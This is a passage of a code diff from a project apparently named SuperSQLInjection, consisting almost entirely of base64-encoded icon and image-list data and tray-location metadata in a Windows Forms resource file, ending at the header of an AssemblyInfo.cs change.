AgABMwFmATMBAAEzAmYBAAEzAWYBmQEAATMBZgHMAQABMwFmAf8BAAEzAZkCAAEzAZkBMwEAATMBmQFm
AQABMwKZAQABMwGZAcwBAAEzAZkB/wEAATMBzAIAATMBzAEzAQABMwHMAWYBAAEzAcwBmQEAATMCzAEA
ATMBzAH/AQABMwH/ATMBAAEzAf8BZgEAATMB/wGZAQABMwH/AcwBAAEzAv8BAAFmAwABZgEAATMBAAFm
AQABZgEAAWYBAAGZAQABZgEAAcwBAAFmAQAB/wEAAWYBMwIAAWYCMwEAAWYBMwFmAQABZgEzAZkBAAFm
ATMBzAEAAWYBMwH/AQACZgIAAmYBMwEAA2YBAAJmAZkBAAJmAcwBAAFmAZkCAAFmAZkBMwEAAWYBmQFm
AQABZgKZAQABZgGZAcwBAAFmAZkB/wEAAWYBzAIAAWYBzAEzAQABZgHMAZkBAAFmAswBAAFmAcwB/wEA
AWYB/wIAAWYB/wEzAQABZgH/AZkBAAFmAf8BzAEAAcwBAAH/AQAB/wEAAcwBAAKZAgABmQEzAZkBAAGZ
AQABmQEAAZkBAAHMAQABmQMAAZkCMwEAAZkBAAFmAQABmQEzAcwBAAGZAQAB/wEAAZkBZgIAAZkBZgEz
AQABmQEzAWYBAAGZAWYBmQEAAZkBZgHMAQABmQEzAf8BAAKZATMBAAKZAWYBAAOZAQACmQHMAQACmQH/
AQABmQHMAgABmQHMATMBAAFmAcwBZgEAAZkBzAGZAQABmQLMAQABmQHMAf8BAAGZAf8CAAGZAf8BMwEA
AZkBzAFmAQABmQH/AZkBAAGZAf8BzAEAAZkC/wEAAcwDAAGZAQABMwEAAcwBAAFmAQABzAEAAZkBAAHM
AQABzAEAAZkBMwIAAcwCMwEAAcwBMwFmAQABzAEzAZkBAAHMATMBzAEAAcwBMwH/AQABzAFmAgABzAFm
ATMBAAGZAmYBAAHMAWYBmQEAAcwBZgHMAQABmQFmAf8BAAHMAZkCAAHMAZkBMwEAAcwBmQFmAQABzAKZ
AQABzAGZAcwBAAHMAZkB/wEAAswCAALMATMBAALMAWYBAALMAZkBAAPMAQACzAH/AQABzAH/AgABzAH/
ATMBAAGZAf8BZgEAAcwB/wGZAQABzAH/AcwBAAHMAv8BAAHMAQABMwEAAf8BAAFmAQAB/wEAAZkBAAHM
ATMCAAH/AjMBAAH/ATMBZgEAAf8BMwGZAQAB/wEzAcwBAAH/ATMB/wEAAf8BZgIAAf8BZgEzAQABzAJm
AQAB/wFmAZkBAAH/AWYBzAEAAcwBZgH/AQAB/wGZAgAB/wGZATMBAAH/AZkBZgEAAf8CmQEAAf8BmQHM
AQAB/wGZAf8BAAH/AcwCAAH/AcwBMwEAAf8BzAFmAQAB/wHMAZkBAAH/AswBAAH/AcwB/wEAAv8BMwEA
AcwB/wFmAQAC/wGZAQAC/wHMAQACZgH/AQABZgH/AWYBAAFmAv8BAAH/AmYBAAH/AWYB/wEAAv8BZgEA
ASEBAAGlAQADXwEAA3cBAAOGAQADlgEAA8sBAAOyAQAD1wEAA90BAAPjAQAD6gEAA/EBAAP4AQAB8AH7
Af8BAAGkAqABAAOAAwAB/wIAAf8DAAL/AQAB/wMAAf8BAAH/AQAC/wIAA/8BAAHxAe8BvAHzAvQE/wL0
AZMBbwEHDQAB/wH0BAAB7QEOAQ8BDgEAAQ4DAAEOAQAB7RIAAe8B8gH3AbwH/wGTAW8BlAFvDAAB8AIO
Ae8DAAETAfcB8gH3AbwB8AEHAREB8gHxAe8BExIAAfEB9wHxAfcB8QUAAZMBbwEWAW8BBwUABv8B8gEO
AUMBFAEOAfMCAAETAfcB7AERAfIBAAHyAfcBkgEHAe8BExMAAfEB7wHwAe8B8QMAAZMBbwEWAW8BGgUA
Av8B8QHvAewB7QH3AewBEQIUAQ4B/wIAARMB9wHsAQAB8wHsAfMBFQHyAesBEQETFAAB8QHvAbwB7wHx
AQABkwFvARYBbwEaBQAB/wH0AQcB7wHwAfMB8gHwAfcBbQETAQ8BBwMAAhMBFQEAAQ8B7AEPAQABQwHt
AUMBExUAAfEB7wG8AQcBvAFvAeMBbwEaBgAB/wIHAfABtAKLAbQB8AEHAW0B7wQAAewK8AHsFgAB8QEH
AW8BRQHjARYBGgcAAfIB7wHxAYoEsgGtAfIB7wHyBAAB7QEAAf8FBwG8AgAB7RcAAfEBRgGUAUYBvAgA
AQcB8QG0AbMFsgG0AfEBBwQAAe0BAAHyAf8D9AH/AbwCAAHtFwABBwEcAm8BBwLvAQcB8AH/AwAB9wH0
BrMBsgGzAfQB9wQAAe0BAAHyAf8D9AH/AbwCAAHtFgACBwG8AfIBvAIHArwCBwH/AgAB7wH0AbMBuQaz
AfQB7wQAAe0BAAHyAf8D9AH/AbwCAAHtFQABBwK8AQAB/wG8AgcBvAHvAfEBBwHxAgABBwHyAboBuQHb
AdoC2wG5AboB8gEHBAAB7QEAAfIB/wP0Af8BvAIAAe0UAAEHArwDAAHwArwB7wHzAQcB8gHwAgAB8wEH
AfQBswTbAbMB8wEHAfMEAAHtAQAB8gX3AewC9AHsEgAB8QEHAvAEAAHxAfAB7wHzAQAB/wHwAfEDAAHx
AfAB8wG6AbQCugHzAvEFAAHtAQAB8gHrARMBEQJtAwABkhIAAbwB8wHwBQAB8gG8AfEB7wH/AQAC/wMA
Af8B8QEHAfMB9AH/AfMBvAHxAf8FAAHtAQAB/wHzAfIB8QLyARABAAHrAf8SAAHyAfEB8gUAAf8B8QHw
AfIBvAH/BwAB8wHwAgcB8AHzBwAB7QcAAREBEwH/HAAB/wHzAvEB/xQAAfcH7QEVAf8WAAH/AbQCAAEH
CBIBBxD/ARIEFQH/AUMBKgL/Ae8CFQESEgABtQTPAQAB6gj/AeoB/w7UAf8BbQX/ASoB9gIjA/8BbRIA
Ac8BAAH/AbQCAAFtAf8C9ATzAf8BbQH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8BbQH/A/MB/wEq
AfYBwwF6AaYC/wFtAgAC7AQAA+wEAALsAQABzwUAAW0B/wH0BfMB/wFtAf8B1ALcARkC9AEZAdwB2wHa
AdMB1AHbAdQB/wFtAf8D9AL/ASoBegGzAdMBpgH/AQcCAAHsAf8E7AH/AewB/wTsAf8B7AcAAesB/wbz
Af8B6wH/AdQCGQH0Av8B9AEZAQkD3AEJAdQB/wHrAf8E9AH/ASoBCQHiAbMB0wGmAv8BAAHsBf8B7AH/
AewF/wHsAQABuwVsAewB/wbzAf8B7AH/DtQB/wHrAf8E9AL/AawBCQHiAbMB0wGmAv8B7Ab/AewG/wHs
AQABiwUZAewB/wbzAf8B7AH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8B6wH/BfQC/wGsAQkB4gGz
AdMBpgH/AewB/wHsAf8B7AH/AewB/wHsBf8B7AEAAYsFGQHsAf8E8wP/AewB/wHUAtwBGQL0ARkB3AHb
AdoB0wHUAdsB1AH/AesJ/wGsAQkB4gGzASYBIAHsAv8B7AP/AewG/wHsAQABkAUZAe0B/wTzAf8C7QHw
Af8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wHsCv8BrAEJAf8BJgEgAewB/wHsA/8B7AH/AewF/wHs
AQABkAUZAZIG/wGSAQcBAAH/AdQCGQH0Av8B9AEZAQkD3AEJAdQB/wHsC/8BrAEmAd4BJQHsAv8C7AL/
AewG/wHsAQABswUZAQcG9wHwAgAB/w7UAf8B7An/AvQB/wElASAB/wHsAf8B7AP/AewB/wHsBf8B7AEA
AbMFGQIJARkBswYAAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wHsCP8BtQLqAQcD/wHsAv8C7AL/
AewG/wHsAQABuQQZAQkDGQG5BAABzwEAAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wHsCP8BtQP/
AfcCAALsBP8B7AH/AewE/wLsAQABuQMZAgkBGQK5AQkB/wG0AgABzwEAAf8B1AIZAfQC/wH0ARkBCQPc
AQkB1AH/AewI/wG1Av8B9wUABOwBAAHsAQAE7AMAAbkGGQG5AboBAATPAbUBAAH/DtQB/wHtCP8BtQH/
AfcUAAEJBrkBCQIAAf8BtAQAEP8K7QH3SAAC8AG8Ae8CkQHvAbwC8AcAAQcBcgFPA0kBcgEHBQAO/wMA
AbwMAAEHAgABvAEHAfcB7wGzAtsBswLvAQcBvAUAAZgBTwFQBJgBTwFJARwEAAEHDOsBBwIAAfMBAAIH
Cv8CAAHwAbsCswGQAboC2wG6AZACswG7AfADAAGYAU8BeAEIAZgClwGYAQgBlwFJARwDAAHrDAcB6wUA
A/QI/wIAAfABtALcBtsC3AG0AfACAAEHAU8BeAEIBpcBCAGXAUkBBwIAAewBvAoPAbwB7AIAAfMBAAIH
A/QH/wIAAbwBswHcAtsB3ALbAdwC2wHcAbMBvAIAAXgBVgEIApcBeAEbAZgDlwEIAU8BcgIAAewB8AoQ
AfAB7AUAA/QB6wEOARAB7AERA/8BAAG8Ae8BtAPbAbMCugGzA9sBtAHvAbwBAAFQApgBlwF4A/8BmAKX
ApgBTwIAAewB8QEQAhEC/wERAf8CEQEQAfEB7AIAAfMBAAIHAfQB8AEAAfAB9AHtAQAD/wEAAQcBswG6
AdsB3AGzAbwCAAG8AbMB3AHbAboBswEHAQABTwGYAZcBeAL/AfQC/wGYApcBmAFJAgAB7AHxAREBQwH/
BkMBEQHxAewFAALzAfIBDgHsAfMBvAEAAfQC/wEAAbsB2wLcAdsBtAQAAbQB2wLcAdsBuwEAAVUBCAF4
AZcBCAHxAZcBCAL/AZgBlwGYAU8CAAHsAfIBEQEVAf8DFQH/AhUBEQHyAewCAAHzAQABBwHvAvMBBwET
AQ4BDwEAAvQB/wEAAbsB2wPcAbQBvALwAbwBtAPcAdsBuwEAAVYCmAWXAQgB/wHzApgBTwIAAewB8wFD
AhUC/wQVAUMB8wHsBQAD8wG8AfIB9AHsARAD9AEAAbwBswLbAdwBswGSAgcBkgGzAdwC2wGzAbwBAAGY
AZcBCAaXAQgBlwEIAVABlwIAAewB9AFDCBQBQwH0AewCAAHzAQABBwHvAvMB7AEPAQ4BEQHvA/QCAAG8
AbQB2wHhAdwBswKQAbMB3AHhAdsBtAG8AgABCAFWAXgBCAaXAQgBeAFPAQcCAAHtAf8KQwH/Ae0FAAHy
B/MD9AIAAbwBswEZA+EC3APhARkBswG8AwABmAFWAXgBCAGYAngBmAEIAXgBTwGYAwAB7Qz/Ae0CAAHz
AQABBwHvAvIG8wL0AwABtAHcAeIC2wLhAtsB4gHcAbQFAAGYAVYBlwSYAZcBUAGYBAAB8AztAfAFAATy
B/MDAAG7AbQBswG0AdsC4gHbAbQBswG0AbsGAAEIAZgEVgGYAQcVAAHzAQAM/wUAArwBswLbAbMCvCYA
AbwMAAG8BgABvAK7AbwGAAFCAU0BPgcAAT4DAAEoAwABQAMAATADAAEBAQABAQUAAYABARYAA/8CAAEB
Af8B8wHAAQMDAAEBAf8B4QHAAQMCAAEHAcEB8AEAAcABAwIAAoMB4AEAAcABAwIAAcEBBwHAAQEBwAED
AgAB4AEPAcABAwHAAQMCAAHwAR8BwAEDAdABGwIAAfgBPwHAAQMB0AEbAgAB+AEBAcABAwHQARsCAAHw
AQABwAEDAdABGwIAAeIBAAHAAQMB0AEbAgABxwEAAcABAwHQAQMCAAEPAQgB4AEHAdABAwIAAR8BBAHg
AQcB0AEDAgABHwEDAfgBHwHfAccCAAH/AYMC/wHAAQ8CAAHMBAABAwL/AQQEAAEDAv8BTAQAAQMBPAF5
AXwEAAEDAQABAQH8BAABAQEAAQEHAAEBBwABAQcAAQEHAAEBAQABAQUAAQEBAAEDBQABAQEAAT8FAAEB
AQABPQMAAQMBAAEBAQABDQMAAQcBwgGHAQABQQMAAQ8C/wEAAc8DAAEfCP8B4AEHAfABDwGAAQEBwAEA
AcABAwHgAQcBgAEBAYABAAGAAQEBwAEDAYABAQGAAQABgAEBAYABAQGAAQEBgAEAAYABAQGAAQEBgAEB
AYADAAGAAQEBgAEBAYABAAEBAoABAQGAAQEBgAEAAQMBwAGAAQEBgAEBAYADAAGAAQEBgAEBAYADAAGA
AQEBgAEBAYABAAGAAQEBgAEBAYABAQGAAQABgAEBAcABAwGAAQEBgAEAAcABAwHgAQcBgAEBAYABAAHA
AQMB8AEPAv8BgAEAAfABDwT/AcABAAH8AT8L
</value>
</data>
<metadata name="data_dbs_ts.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>17, 55</value>
</metadata>
<metadata name="toolStrip1.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>278, 55</value>
</metadata>
<assembly alias="System.Drawing" name="System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
<data name="data_dbs_tsl_getDBS.Image" type="System.Drawing.Bitmap, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>
@@ -287,7 +186,7 @@
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACq
DQAAAk1TRnQBSQFMAgEBBwEAAXgBBwF4AQcBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
DQAAAk1TRnQBSQFMAgEBBwEAAYgBBwGIAQcBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
AwABQAMAASADAAEBAQABCAYAAQgYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA
AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5
AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA
@@ -348,6 +247,9 @@
AQEEAAGAAQEBgAEBBAAE/wQABP8CAAs=
</value>
</data>
<metadata name="toolStrip1.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>278, 55</value>
</metadata>
<data name="data_dbs_tsl_getDatas.Image" type="System.Drawing.Bitmap, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>
iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8
@@ -381,6 +283,104 @@
<metadata name="cms_data_dbs_lvw_data.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>538, 55</value>
</metadata>
<metadata name="myicon_list.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>747, 17</value>
</metadata>
<data name="myicon_list.ImageStream" mimetype="application/x-microsoft.net.object.binary.base64">
<value>
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAAB8
FAAAAk1TRnQBSQFMAgEBCwEAARABCAEQAQgBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
AwABQAMAATADAAEBAQABCAYAAQwYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA
AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5
AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA
AWYDAAGZAwABzAIAATMDAAIzAgABMwFmAgABMwGZAgABMwHMAgABMwH/AgABZgMAAWYBMwIAAmYCAAFm
AZkCAAFmAcwCAAFmAf8CAAGZAwABmQEzAgABmQFmAgACmQIAAZkBzAIAAZkB/wIAAcwDAAHMATMCAAHM
AWYCAAHMAZkCAALMAgABzAH/AgAB/wFmAgAB/wGZAgAB/wHMAQABMwH/AgAB/wEAATMBAAEzAQABZgEA
ATMBAAGZAQABMwEAAcwBAAEzAQAB/wEAAf8BMwIAAzMBAAIzAWYBAAIzAZkBAAIzAcwBAAIzAf8BAAEz
AWYCAAEzAWYBMwEAATMCZgEAATMBZgGZAQABMwFmAcwBAAEzAWYB/wEAATMBmQIAATMBmQEzAQABMwGZ
AWYBAAEzApkBAAEzAZkBzAEAATMBmQH/AQABMwHMAgABMwHMATMBAAEzAcwBZgEAATMBzAGZAQABMwLM
AQABMwHMAf8BAAEzAf8BMwEAATMB/wFmAQABMwH/AZkBAAEzAf8BzAEAATMC/wEAAWYDAAFmAQABMwEA
AWYBAAFmAQABZgEAAZkBAAFmAQABzAEAAWYBAAH/AQABZgEzAgABZgIzAQABZgEzAWYBAAFmATMBmQEA
AWYBMwHMAQABZgEzAf8BAAJmAgACZgEzAQADZgEAAmYBmQEAAmYBzAEAAWYBmQIAAWYBmQEzAQABZgGZ
AWYBAAFmApkBAAFmAZkBzAEAAWYBmQH/AQABZgHMAgABZgHMATMBAAFmAcwBmQEAAWYCzAEAAWYBzAH/
AQABZgH/AgABZgH/ATMBAAFmAf8BmQEAAWYB/wHMAQABzAEAAf8BAAH/AQABzAEAApkCAAGZATMBmQEA
AZkBAAGZAQABmQEAAcwBAAGZAwABmQIzAQABmQEAAWYBAAGZATMBzAEAAZkBAAH/AQABmQFmAgABmQFm
ATMBAAGZATMBZgEAAZkBZgGZAQABmQFmAcwBAAGZATMB/wEAApkBMwEAApkBZgEAA5kBAAKZAcwBAAKZ
Af8BAAGZAcwCAAGZAcwBMwEAAWYBzAFmAQABmQHMAZkBAAGZAswBAAGZAcwB/wEAAZkB/wIAAZkB/wEz
AQABmQHMAWYBAAGZAf8BmQEAAZkB/wHMAQABmQL/AQABzAMAAZkBAAEzAQABzAEAAWYBAAHMAQABmQEA
AcwBAAHMAQABmQEzAgABzAIzAQABzAEzAWYBAAHMATMBmQEAAcwBMwHMAQABzAEzAf8BAAHMAWYCAAHM
AWYBMwEAAZkCZgEAAcwBZgGZAQABzAFmAcwBAAGZAWYB/wEAAcwBmQIAAcwBmQEzAQABzAGZAWYBAAHM
ApkBAAHMAZkBzAEAAcwBmQH/AQACzAIAAswBMwEAAswBZgEAAswBmQEAA8wBAALMAf8BAAHMAf8CAAHM
Af8BMwEAAZkB/wFmAQABzAH/AZkBAAHMAf8BzAEAAcwC/wEAAcwBAAEzAQAB/wEAAWYBAAH/AQABmQEA
AcwBMwIAAf8CMwEAAf8BMwFmAQAB/wEzAZkBAAH/ATMBzAEAAf8BMwH/AQAB/wFmAgAB/wFmATMBAAHM
AmYBAAH/AWYBmQEAAf8BZgHMAQABzAFmAf8BAAH/AZkCAAH/AZkBMwEAAf8BmQFmAQAB/wKZAQAB/wGZ
AcwBAAH/AZkB/wEAAf8BzAIAAf8BzAEzAQAB/wHMAWYBAAH/AcwBmQEAAf8CzAEAAf8BzAH/AQAC/wEz
AQABzAH/AWYBAAL/AZkBAAL/AcwBAAJmAf8BAAFmAf8BZgEAAWYC/wEAAf8CZgEAAf8BZgH/AQAC/wFm
AQABIQEAAaUBAANfAQADdwEAA4YBAAOWAQADywEAA7IBAAPXAQAD3QEAA+MBAAPqAQAD8QEAA/gBAAHw
AfsB/wEAAaQCoAEAA4ADAAH/AgAB/wMAAv8BAAH/AwAB/wEAAf8BAAL/AgAD/wEAAfEB7wG8AfMC9AT/
AvQBkwFvAQcNAAH/AfQEAAHtAQ4BDwEOAQABDgMAAQ4BAAHtEgAB7wHyAfcBvAf/AZMBbwGUAW8MAAHw
Ag4B7wMAARMB9wHyAfcBvAHwAQcBEQHyAfEB7wETEgAB8QH3AfEB9wHxBQABkwFvARYBbwEHBQAG/wHy
AQ4BQwEUAQ4B8wIAARMB9wHsAREB8gEAAfIB9wGSAQcB7wETEwAB8QHvAfAB7wHxAwABkwFvARYBbwEa
BQAC/wHxAe8B7AHtAfcB7AERAhQBDgH/AgABEwH3AewBAAHzAewB8wEVAfIB6wERARMUAAHxAe8BvAHv
AfEBAAGTAW8BFgFvARoFAAH/AfQBBwHvAfAB8wHyAfAB9wFtARMBDwEHAwACEwEVAQABDwHsAQ8BAAFD
Ae0BQwETFQAB8QHvAbwBBwG8AW8B4wFvARoGAAH/AgcB8AG0AosBtAHwAQcBbQHvBAAB7ArwAewWAAHx
AQcBbwFFAeMBFgEaBwAB8gHvAfEBigSyAa0B8gHvAfIEAAHtAQAB/wUHAbwCAAHtFwAB8QFGAZQBRgG8
CAABBwHxAbQBswWyAbQB8QEHBAAB7QEAAfIB/wP0Af8BvAIAAe0XAAEHARwCbwEHAu8BBwHwAf8DAAH3
AfQGswGyAbMB9AH3BAAB7QEAAfIB/wP0Af8BvAIAAe0WAAIHAbwB8gG8AgcCvAIHAf8CAAHvAfQBswG5
BrMB9AHvBAAB7QEAAfIB/wP0Af8BvAIAAe0VAAEHArwBAAH/AbwCBwG8Ae8B8QEHAfECAAEHAfIBugG5
AdsB2gLbAbkBugHyAQcEAAHtAQAB8gH/A/QB/wG8AgAB7RQAAQcCvAMAAfACvAHvAfMBBwHyAfACAAHz
AQcB9AGzBNsBswHzAQcB8wQAAe0BAAHyBfcB7AL0AewSAAHxAQcC8AQAAfEB8AHvAfMBAAH/AfAB8QMA
AfEB8AHzAboBtAK6AfMC8QUAAe0BAAHyAesBEwERAm0DAAGSEgABvAHzAfAFAAHyAbwB8QHvAf8BAAL/
AwAB/wHxAQcB8wH0Af8B8wG8AfEB/wUAAe0BAAH/AfMB8gHxAvIBEAEAAesB/xIAAfIB8QHyBQAB/wHx
AfAB8gG8Af8HAAHzAfACBwHwAfMHAAHtBwABEQETAf8cAAH/AfMC8QH/FAAB9wftARUB/xYAAf8BtAIA
AQcIEgEHEP8BEgQVAf8BQwEqAv8B7wIVARISAAG1BM8BAAHqCP8B6gH/DtQB/wFtBf8BKgH2AiMD/wFt
EgABzwEAAf8BtAIAAW0B/wL0BPMB/wFtAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wFtAf8D8wH/
ASoB9gHDAXoBpgL/AW0CAALsBAAD7AQAAuwBAAHPBQABbQH/AfQF8wH/AW0B/wHUAtwBGQL0ARkB3AHb
AdoB0wHUAdsB1AH/AW0B/wP0Av8BKgF6AbMB0wGmAf8BBwIAAewB/wTsAf8B7AH/BOwB/wHsBwAB6wH/
BvMB/wHrAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AesB/wT0Af8BKgEJAeIBswHTAaYC/wEAAewF/wHs
Af8B7AX/AewBAAG7BWwB7AH/BvMB/wHsAf8O1AH/AesB/wT0Av8BrAEJAeIBswHTAaYC/wHsBv8B7Ab/
AewBAAGLBRkB7AH/BvMB/wHsAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wHrAf8F9AL/AawBCQHi
AbMB0wGmAf8B7AH/AewB/wHsAf8B7AH/AewF/wHsAQABiwUZAewB/wTzA/8B7AH/AdQC3AEZAvQBGQHc
AdsB2gHTAdQB2wHUAf8B6wn/AawBCQHiAbMBJgEgAewC/wHsA/8B7Ab/AewBAAGQBRkB7QH/BPMB/wLt
AfAB/wHUAtwBGQL0ARkB3AHbAdoB0wHUAdsB1AH/AewK/wGsAQkB/wEmASAB7AH/AewD/wHsAf8B7AX/
AewBAAGQBRkBkgb/AZIBBwEAAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AewL/wGsASYB3gElAewC/wLs
Av8B7Ab/AewBAAGzBRkBBwb3AfACAAH/DtQB/wHsCf8C9AH/ASUBIAH/AewB/wHsA/8B7AH/AewF/wHs
AQABswUZAgkBGQGzBgAB/wHUAtwBGQL0ARkB3AHbAdoB0wHUAdsB1AH/AewI/wG1AuoBBwP/AewC/wLs
Av8B7Ab/AewBAAG5BBkBCQMZAbkEAAHPAQAB/wHUAtwBGQL0ARkB3AHbAdoB0wHUAdsB1AH/AewI/wG1
A/8B9wIAAuwE/wHsAf8B7AT/AuwBAAG5AxkCCQEZArkBCQH/AbQCAAHPAQAB/wHUAhkB9AL/AfQBGQEJ
A9wBCQHUAf8B7Aj/AbUC/wH3BQAE7AEAAewBAATsAwABuQYZAbkBugEABM8BtQEAAf8O1AH/Ae0I/wG1
Af8B9xQAAQkGuQEJAgAB/wG0BAAQ/wrtAfdIAALwAbwB7wKRAe8BvALwBwABBwFyAU8DSQFyAQcFAA7/
AwABvAwAAQcCAAG8AQcB9wHvAbMC2wGzAu8BBwG8BQABmAFPAVAEmAFPAUkBHAQAAQcM6wEHAgAB8wEA
AgcK/wIAAfABuwKzAZABugLbAboBkAKzAbsB8AMAAZgBTwF4AQgBmAKXAZgBCAGXAUkBHAMAAesMBwHr
BQAD9Aj/AgAB8AG0AtwG2wLcAbQB8AIAAQcBTwF4AQgGlwEIAZcBSQEHAgAB7AG8Cg8BvAHsAgAB8wEA
AgcD9Af/AgABvAGzAdwC2wHcAtsB3ALbAdwBswG8AgABeAFWAQgClwF4ARsBmAOXAQgBTwFyAgAB7AHw
ChAB8AHsBQAD9AHrAQ4BEAHsARED/wEAAbwB7wG0A9sBswK6AbMD2wG0Ae8BvAEAAVACmAGXAXgD/wGY
ApcCmAFPAgAB7AHxARACEQL/AREB/wIRARAB8QHsAgAB8wEAAgcB9AHwAQAB8AH0Ae0BAAP/AQABBwGz
AboB2wHcAbMBvAIAAbwBswHcAdsBugGzAQcBAAFPAZgBlwF4Av8B9AL/AZgClwGYAUkCAAHsAfEBEQFD
Af8GQwERAfEB7AUAAvMB8gEOAewB8wG8AQAB9AL/AQABuwHbAtwB2wG0BAABtAHbAtwB2wG7AQABVQEI
AXgBlwEIAfEBlwEIAv8BmAGXAZgBTwIAAewB8gERARUB/wMVAf8CFQERAfIB7AIAAfMBAAEHAe8C8wEH
ARMBDgEPAQAC9AH/AQABuwHbA9wBtAG8AvABvAG0A9wB2wG7AQABVgKYBZcBCAH/AfMCmAFPAgAB7AHz
AUMCFQL/BBUBQwHzAewFAAPzAbwB8gH0AewBEAP0AQABvAGzAtsB3AGzAZICBwGSAbMB3ALbAbMBvAEA
AZgBlwEIBpcBCAGXAQgBUAGXAgAB7AH0AUMIFAFDAfQB7AIAAfMBAAEHAe8C8wHsAQ8BDgERAe8D9AIA
AbwBtAHbAeEB3AGzApABswHcAeEB2wG0AbwCAAEIAVYBeAEIBpcBCAF4AU8BBwIAAe0B/wpDAf8B7QUA
AfIH8wP0AgABvAGzARkD4QLcA+EBGQGzAbwDAAGYAVYBeAEIAZgCeAGYAQgBeAFPAZgDAAHtDP8B7QIA
AfMBAAEHAe8C8gbzAvQDAAG0AdwB4gLbAuEC2wHiAdwBtAUAAZgBVgGXBJgBlwFQAZgEAAHwDO0B8AUA
BPIH8wMAAbsBtAGzAbQB2wLiAdsBtAGzAbQBuwYAAQgBmARWAZgBBxUAAfMBAAz/BQACvAGzAtsBswK8
JgABvAwAAbwGAAG8ArsBvAYAAUIBTQE+BwABPgMAASgDAAFAAwABMAMAAQEBAAEBBQABgAEBFgAD/wIA
AQEB/wHzAcABAwMAAQEB/wHhAcABAwIAAQcBwQHwAQABwAEDAgACgwHgAQABwAEDAgABwQEHAcABAQHA
AQMCAAHgAQ8BwAEDAcABAwIAAfABHwHAAQMB0AEbAgAB+AE/AcABAwHQARsCAAH4AQEBwAEDAdABGwIA
AfABAAHAAQMB0AEbAgAB4gEAAcABAwHQARsCAAHHAQABwAEDAdABAwIAAQ8BCAHgAQcB0AEDAgABHwEE
AeABBwHQAQMCAAEfAQMB+AEfAd8BxwIAAf8BgwL/AcABDwIAAcwEAAEDAv8BBAQAAQMC/wFMBAABAwE8
AXkBfAQAAQMBAAEBAfwEAAEBAQABAQcAAQEHAAEBBwABAQcAAQEBAAEBBQABAQEAAQMFAAEBAQABPwUA
AQEBAAE9AwABAwEAAQEBAAENAwABBwHCAYcBAAFBAwABDwL/AQABzwMAAR8I/wHgAQcB8AEPAYABAQHA
AQABwAEDAeABBwGAAQEBgAEAAYABAQHAAQMBgAEBAYABAAGAAQEBgAEBAYABAQGAAQABgAEBAYABAQGA
AQEBgAMAAYABAQGAAQEBgAEAAQECgAEBAYABAQGAAQABAwHAAYABAQGAAQEBgAMAAYABAQGAAQEBgAMA
AYABAQGAAQEBgAEAAYABAQGAAQEBgAEBAYABAAGAAQEBwAEDAYABAQGAAQABwAEDAeABBwGAAQEBgAEA
AcABAwHwAQ8C/wGAAQAB8AEPBP8BwAEAAfwBPws=
</value>
</data>
<metadata name="cms_dataPacks.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>138, 55</value>
</metadata>

4
SuperSQLInjection/Properties/AssemblyInfo.cs
View File

@@ -32,5 +32,5 @@ using System.Runtime.InteropServices;
// 可以指定所有这些值,也可以使用“内部版本号”和“修订号”的默认值,
// 方法是按如下所示使用“*”:
